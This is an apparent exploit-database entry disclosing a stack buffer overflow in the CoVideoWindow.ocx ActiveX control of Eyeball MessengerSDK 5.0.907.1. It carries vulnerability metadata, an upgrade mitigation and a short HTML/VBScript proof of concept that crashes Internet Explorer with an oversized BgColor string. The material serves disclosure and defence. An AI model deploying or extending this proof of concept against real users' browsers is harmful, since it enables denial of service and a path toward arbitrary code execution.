header-logo
Suggest Exploit
vendor:
CoVideoWindow.ocx ActiveX Control
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: CoVideoWindow.ocx ActiveX Control
Affected Version From: 5.0.907.1
Affected Version To: 5.0.907.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:eyeball_messengersdk:eyeball_messengersdk
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer
2007

CoVideoWindow.ocx ActiveX Control Buffer Overflow Vulnerability

The 'CoVideoWindow.ocx' ActiveX control of Eyeball MessengerSDK is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

Mitigation:

Upgrade to the latest version of the CoVideoWindow.ocx ActiveX control.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/30424/info

The 'CoVideoWindow.ocx' ActiveX control of Eyeball MessengerSDK is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of an application using the affected ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.

This issue affects 'CoVideoWindow.ocx' 5.0.907.1; other versions may also be affected.

<html> <object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object> <input language=VBScript onclick=buffero() type=button value="Crash"> <script language = 'vbscript'> Sub buffero() crash = String(515000, unescape("%41")) test.BgColor = crash End Sub </script> </html>